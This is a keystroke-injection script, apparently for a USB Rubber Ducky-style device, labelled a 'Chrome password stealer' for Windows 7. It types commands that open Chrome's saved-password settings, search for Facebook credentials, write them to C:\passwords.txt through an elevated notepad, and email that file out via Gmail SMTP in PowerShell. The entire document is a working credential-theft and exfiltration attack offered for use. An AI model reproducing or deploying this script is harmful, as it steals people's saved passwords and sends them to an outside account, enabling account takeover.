layout('es');                   // Spanish keyboard layout
typingSpeed(100,150)    // Wait 100ms between key strokes + an additional random value between 0ms and 150ms (natural)

// Author: Ernest & Isaac
// Ducky chrome password stealer: 1.0
// Target: Windows 7
// Description: Opens chrome, navigates to chrome settings, navigates to saved passwords, searches for facebook, shows password, copys password
// closes chrome, Opens notepad with bypass uac so it can save to C:\ drive and pastes in password
// saves to C:\passwords.txt folder, closes notepad
// sends files via gmail to account.
delay(2000)
// -------------open chrome
press("GUI r")
delay(1000)
type("chrome")
delay(1000)
press("ENTER")
delay(4000)
// -------------copy plaintext password
type("chrome://settings/passwords")
press("ENTER")
delay(2000)
type("facebook")
delay(500)
press("TAB")
delay(500)
press("DOWN")
delay(500)
press("TAB")
delay(500)
press("TAB")
delay(500)
press("ENTER")
delay(500)
delay(500)
press("TAB")
delay(500)
press("TAB")
delay(500)
press("TAB")
delay(500)
delay(500)
delay(500)
// -------------save file to music folder as passwords.txt
delay(500)
type("powershell start-process notepad.exe -Verb runAs")
delay(500 )
press("ENTER")
delay(2000)
delay(1000)
delay(500)
delay(500)
type("s")
delay(500)
type("passwords.txt")
delay(500)
press("TAB")
press("TAB")
press("TAB")
press("TAB")
press("TAB")
press("TAB")
press("TAB")
press("TAB")
press("TAB")
type("c")
delay(1000)
type("l")
delay(500)
press("ENTER")
delay(500)
delay(1000)
delay(500)
// -------------email log via gmail
press("GUI r")
delay(500)
type("powershell")
press("ENTER")
delay(1000)
type("$SMTPServer = 'smtp.gmail.com'")
press("ENTER")
type("$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)")
press("ENTER")
type("$SMTPInfo.EnableSsl = $true")
press("ENTER")
type("$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('youremail@gmail.com', 'password');")
press("ENTER")
type("$ReportEmail = New-Object System.Net.Mail.MailMessage")
press("ENTER")
type("$ReportEmail.From = 'youremail@gmail.com'")
press("ENTER")
type("$ReportEmail.To.Add('toemail@gmail.com')")
press("ENTER")
type("$ReportEmail.Subject = 'Ducky chrome passwords'")
press("ENTER")
type("$ReportEmail.Body = 'Attached is your list of passwords.' ")
press("ENTER")
type("$ReportEmail.Attachments.Add('c:\passwords.txt')")
press("ENTER")
type("$SMTPInfo.Send($ReportEmail)")
press("ENTER")
delay(3000)
type("exit")
press("ENTER")
